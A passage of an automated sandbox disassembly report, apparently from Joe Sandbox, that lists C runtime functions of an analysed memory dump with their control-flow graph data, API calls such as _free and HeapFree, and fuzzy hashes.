                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8CD19C71D003099FEB218FA8C885BEEBBF5BF08304F14516DE595B7282DB71A885CB60
                                                                                                                                                                                                                                                    Function 00E0FFAF Relevance: 25.9, APIs: 17, Instructions: 411COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 738 e0ffaf-e0ffbd 739 e0ffd2-e0ffe5 call e18410 738->739 740 e0ffbf-e0ffcd call e01182 738->740 746 e101c6-e101cb call e01182 739->746 747 e0ffeb-e0ffed 739->747 745 e101df-e101e1 740->745 753 e101d1 746->753 747->746 748 e0fff3-e10006 call e105ae 747->748 754 e10083-e1008d 748->754 755 e10008-e1000b 748->755 756 e101d4-e101de call e080d6 753->756 754->753 759 e10093-e100a9 call e105e2 754->759 757 e10029-e1002c 755->757 758 e1000d-e10013 755->758 756->745 761 e10035-e10037 757->761 762 e1002e-e10030 757->762 758->757 764 e10015-e1001c call e041fa 758->764 769 e100ab-e100ad 759->769 770 e100fa-e100fd 759->770 766 e10039 call e0a6b0 761->766 762->756 764->746 775 e10022-e10027 call e105ae 764->775 771 e1003e-e10052 call e080d6 766->771 769->770 773 e100af-e100be call e080d6 769->773 770->756 776 e10103-e1010d 770->776 771->753 783 e10058-e1005e 771->783 786 e100f0-e100f8 773->786 787 e100c0-e100c3 773->787 775->754 776->753 777 e10113-e10119 776->777 777->753 781 e1011f-e10139 call e106a5 call e080d6 777->781 781->753 802 e1013f-e10147 781->802 783->754 788 e10060-e10062 783->788 792 e10150-e10153 786->792 790 e100cd-e100d0 787->790 791 e10064 call e0a6b0 788->791 794 e100d2-e100ec call e106a5 call e080d6 790->794 795 e100c5-e100cc 790->795 796 e10069-e1007d call e080d6 791->796 792->756 797 e10155 792->797 794->792 811 e100ee 794->811 795->790 796->753 796->754 801 e10158-e1015d 797->801 801->801 805 e1015f-e10167 801->805 806 e1014b 802->806 808 e1016a call e0a6b0 805->808 806->792 810 e1016f-e10175 808->810 812 e10177-e10188 call e06100 810->812 813 e101bd-e101c4 call e080d6 810->813 811->806 818 e101e2 812->818 819 e1018a-e101ad call e16dd1 812->819 813->756 821 e101e7 call dfef66 818->821 819->813 824 e101af-e101b7 call e01182 819->824 823 e101ec-e101fb 821->823 825 e10210-e10223 call e1853b 823->825 826 e101fd-e1020b call e01182 823->826 824->813 834 e10419-e1041e call e01182 825->834 835 e10229-e1022b 825->835 833 e10432-e10434 826->833 840 e10424 834->840 835->834 837 e10231-e1024c call e105c8 835->837 843 e10252-e1025a 837->843 844 e102d7-e102f1 call e10637 837->844 842 e10427-e10431 call e080d6 840->842 842->833 845 e10274-e10278 843->845 846 e1025c-e1025e 843->846 855 e102f3-e102f5 844->855 856 e1033f-e10343 844->856 851 e10281-e10283 845->851 852 e1027a-e1027c 845->852 846->845 849 e10260-e10267 call e041ff 846->849 849->834 865 e1026d-e10272 call e105c8 849->865 857 e102b2-e102b4 851->857 858 e10285-e10287 851->858 852->842 855->856 862 e102f7-e10307 call e080d6 855->862 856->842 861 e10349-e10353 856->861 859 e102b6 call e0a6b0 857->859 863 e10289 call e0a6b0 858->863 864 e102bb-e102c6 call e080d6 859->864 861->840 866 e10359-e1035f 861->866 877 e10309-e10311 862->877 878 e1031e-e10321 862->878 868 e1028e-e102a2 call e080d6 863->868 882 e102c9-e102d1 864->882 865->882 866->840 871 e10365-e1037b call e106a5 call e080d6 866->871 868->840 885 e102a8-e102b0 868->885 871->840 894 e10381-e1038c 871->894 884 e10396-e10399 877->884 880 e10323-e1033b call e106a5 call e080d6 878->880 881 e10316-e1031d 878->881 880->884 898 e1033d 880->898 881->878 882->840 882->844 884->842 887 e1039f-e103a1 884->887 885->844 885->857 890 e103a4-e103ad 887->890 890->890 893 e103af-e103b9 890->893 896 e103bc call e0a6b0 893->896 897 e10390 894->897 899 e103c1-e103c7 896->899 897->884 898->897 900 e10410-e10417 call e080d6 899->900 901 e103c9-e103db call e0c589 899->901 900->842 906 e10435 901->906 907 e103dd-e10400 SetEnvironmentVariableW 901->907 908 e1043a call dfef66 906->908 907->900 909 e10402-e1040a call e01182 907->909 910 e1043f 908->910 909->900
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3409252457-0
                                                                                                                                                                                                                                                    • Opcode ID: 606cca1659a8f8f4ca08a5f8587157916df5c942ea71380c8767d591b30e378b
                                                                                                                                                                                                                                                    • Instruction ID: 5d49abf0ce558af6619c28feefd149540862300acfd07fa7bd78908c7c8789ba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 606cca1659a8f8f4ca08a5f8587157916df5c942ea71380c8767d591b30e378b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAD127B1A01305AFDB20AFA49C86AEE7BE8EF04314F05556DE951B72C2EBF599C0C750
                                                                                                                                                                                                                                                    Function 00E10A25 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 373COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 913 e10a25-e10a44 914 e10a46-e10a4c 913->914 915 e10a5d-e10a5f 913->915 914->915 917 e10a4e-e10a58 914->917 916 e10a61 call e0a6b0 915->916 919 e10a66-e10a77 call e080d6 916->919 918 e10d90-e10d98 917->918 921 e10d9a 918->921 922 e10d9d-e10da2 918->922 926 e10a81-e10a83 919->926 927 e10a79-e10a7c 919->927 921->922 924 e10dc2-e10dd0 922->924 925 e10da4-e10dab 922->925 928 e10dd6-e10dda 924->928 925->924 929 e10dad-e10dc1 call e080d6 * 2 925->929 931 e10a85 call e0a6b0 926->931 927->928 929->924 933 e10a8a-e10a9b call e080d6 931->933 938 e10aa6-e10aad 933->938 939 e10a9d-e10a9e call e080d6 933->939 941 e10ab3-e10ab5 938->941 942 e10d35-e10d40 938->942 945 e10aa3-e10aa4 939->945 943 e10ab7 call e0a6b0 941->943 944 e10d42-e10d8c 942->944 946 e10abc-e10acd call e080d6 943->946 944->918 947 e10d8e 944->947 945->927 950 e10ae1-e10cdc call e0c0a3 * 21 946->950 951 e10acf-e10adf call e080d6 * 2 946->951 947->918 998 e10d07-e10d0c 950->998 999 e10cde-e10cff call e10927 call e080d6 * 3 950->999 951->945 1001 e10d19-e10d1d 998->1001 999->998 1002 e10d1f 1001->1002 1003 e10d0e-e10d14 1001->1003 1002->944 1005 e10d21-e10d23 1003->1005 1006 e10d16 1003->1006 1008 e10d18 1005->1008 1009 e10d25 1005->1009 1006->1008 1008->1001 1011 e10d27-e10d31 1009->1011 1011->1011 1013 e10d33 1011->1013 1013->1001
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: @b$@b
                                                                                                                                                                                                                                                    • API String ID: 269201875-3807646245
                                                                                                                                                                                                                                                    • Opcode ID: 0b67876d3a462f48ffed743cf68649e4a7b88fe0a9bb2e5cc5fb57e955fc2b60
                                                                                                                                                                                                                                                    • Instruction ID: 841ae074266aa9be67f8730a9f5402decdddc2d62e568a5dcf4696c21b63b965
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b67876d3a462f48ffed743cf68649e4a7b88fe0a9bb2e5cc5fb57e955fc2b60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27C11272D40204AFEB20DBA8DD42FEE77F8AF48714F155165FA45FB2C2D6B0A9809790
                                                                                                                                                                                                                                                    Function 00E1162D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00E11671
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E10944
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E10956
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E10968
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E1097A
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E1098C
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E1099E
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E109B0
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E109C2
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E109D4
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E109E6
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E109F8
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E10A0A
                                                                                                                                                                                                                                                      • Part of subcall function 00E10927: _free.LIBCMT ref: 00E10A1C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E11666
                                                                                                                                                                                                                                                      • Part of subcall function 00E080D6: HeapFree.KERNEL32(00000000,00000000,?,00E1107C,?,00000000,?,?,?,00E1131F,?,00000007,?,?,00E117C4,?), ref: 00E080EC
                                                                                                                                                                                                                                                      • Part of subcall function 00E080D6: GetLastError.KERNEL32(?,?,00E1107C,?,00000000,?,?,?,00E1131F,?,00000007,?,?,00E117C4,?,?), ref: 00E080FE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E11688
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E1169D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E116A8
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E116CA
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E116DD
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E116EB
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E116F6
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E1172E
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E11735
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E11752
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E1176A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                    • String ID: @b
                                                                                                                                                                                                                                                    • API String ID: 161543041-2077063687
                                                                                                                                                                                                                                                    • Opcode ID: 29f9b3d6a75bcc9d4ab74c30762c46f10985c54b5736b4cc1dca4f8b0ca1b2d9
                                                                                                                                                                                                                                                    • Instruction ID: cc86bcef4f1ca8e9c9a3c11ec42377f477e51cdf2b145a890700bda9dc09a730
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29f9b3d6a75bcc9d4ab74c30762c46f10985c54b5736b4cc1dca4f8b0ca1b2d9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF317A31A003019FEB30AA38D945B9A77E9BF10354F1464AAE1A9F72D1DF72ECC48B51
                                                                                                                                                                                                                                                    Function 00DF991A Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00E38FA8,00000FA0,?,?,00DF98F8), ref: 00DF9926
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00DF98F8), ref: 00DF9931
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00DF98F8), ref: 00DF9942
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00DF9954
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00DF9962
                                                                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00DF98F8), ref: 00DF9985
                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(00E38FA8,00000007,?,?,00DF98F8), ref: 00DF99A1
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00DF98F8), ref: 00DF99B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • WakeAllConditionVariable, xrefs: 00DF995A
                                                                                                                                                                                                                                                    • kernel32.dll, xrefs: 00DF993D
                                                                                                                                                                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00DF992C
                                                                                                                                                                                                                                                    • SleepConditionVariableCS, xrefs: 00DF994E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                                                    • Opcode ID: 1604c52b7e3c85ef4fc5e299928564b3fae4887c9cf45c2dd6b0adc602228f29
                                                                                                                                                                                                                                                    • Instruction ID: 6fff2fb0dcb361e053de4b7b44da975d1026b6d91b7bcc9cfa55d73cbcb5d2f4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1604c52b7e3c85ef4fc5e299928564b3fae4887c9cf45c2dd6b0adc602228f29
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9901F572B40319AFC7311BB67D0CF363A68BB60B90B0A1158FA01F21A0DFF48A058A30
                                                                                                                                                                                                                                                    Function 00E0B44D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 0-3907804496
                                                                                                                                                                                                                                                    • Opcode ID: 0defe11cb0f32944b3770013f73d124f1d83a426e8350802e6a2b5eb7240d0e9
                                                                                                                                                                                                                                                    • Instruction ID: 1067228d18db9015424e1c8e3e790f490ba219cf91b53304d7833c1f8231fa27
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0defe11cb0f32944b3770013f73d124f1d83a426e8350802e6a2b5eb7240d0e9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2C1DF70A052099FDB15DFA9D891BAEBBB1BF89304F086199E540BB3D2C771D9C1CB60
                                                                                                                                                                                                                                                    Function 00E139BF Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00E13678: CreateFileW.KERNEL32(00000000,?,?,h:,?,?,00000000,?,00E13A68,00000000,0000000C), ref: 00E13695
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E13AD3
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E13ADA
                                                                                                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00E13AE6
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E13AF0
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E13AF9
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E13B19
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00E07311), ref: 00E13C66
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E13C98
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E13C9F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                    • Opcode ID: f5ac58bb157ce5083694f8f6c3c3a1897c1b34b2766d29f26c98138f5eb82e47
                                                                                                                                                                                                                                                    • Instruction ID: 47d55a51fea3d728fde4dad0c149e70f95836574b3b3ce5522d44e06daab897e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5ac58bb157ce5083694f8f6c3c3a1897c1b34b2766d29f26c98138f5eb82e47
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEA14632A041489FCF199F78DC52BEE7BA1AB06324F141199F801BF2E1DB358E86CB51
                                                                                                                                                                                                                                                    Function 00E10E44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: @b
                                                                                                                                                                                                                                                    • API String ID: 269201875-2077063687
                                                                                                                                                                                                                                                    • Opcode ID: e49e45222676a2d072cfa50b096b09b8e8521dfbcbdf796a6e02f2ba3c752ed8
                                                                                                                                                                                                                                                    • Instruction ID: 1fdf20f54bb998f6de62a15a2272f5f64625515ae29c383e76c01b25fc49b585
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e49e45222676a2d072cfa50b096b09b8e8521dfbcbdf796a6e02f2ba3c752ed8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E61C372900305EFDB20DF74C842BEBB7E9AB48710F246559E995FB281EBB19DC18B50
                                                                                                                                                                                                                                                    Function 00DFCC42 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 00DFCD3F
                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00DFCD61
                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00DFCE70
                                                                                                                                                                                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 00DFCF42
                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00DFCFC6
                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00DFCFE1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 2123188842-393685449
                                                                                                                                                                                                                                                    • Opcode ID: b4f7db61182baf7d1d7a6b023fb9453ffe81c01928e8486b45e31c00e61037a8
                                                                                                                                                                                                                                                    • Instruction ID: a4034ec0ef1a9cc0df907543b9ab019a49c64056beba56f2720ef6dd9a613c78
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4f7db61182baf7d1d7a6b023fb9453ffe81c01928e8486b45e31c00e61037a8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76B18E7181020DAFCF25DFA4CA419BEBBB6FF04310B1A9069FA146B251D731DA61CBB1
                                                                                                                                                                                                                                                    Function 00E06BD8 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06BEE
                                                                                                                                                                                                                                                      • Part of subcall function 00E080D6: HeapFree.KERNEL32(00000000,00000000,?,00E1107C,?,00000000,?,?,?,00E1131F,?,00000007,?,?,00E117C4,?), ref: 00E080EC
                                                                                                                                                                                                                                                      • Part of subcall function 00E080D6: GetLastError.KERNEL32(?,?,00E1107C,?,00000000,?,?,?,00E1131F,?,00000007,?,?,00E117C4,?,?), ref: 00E080FE
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06BFA
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06C05
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06C10
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06C1B
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06C26
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06C31
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06C3C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06C47
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E06C55
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
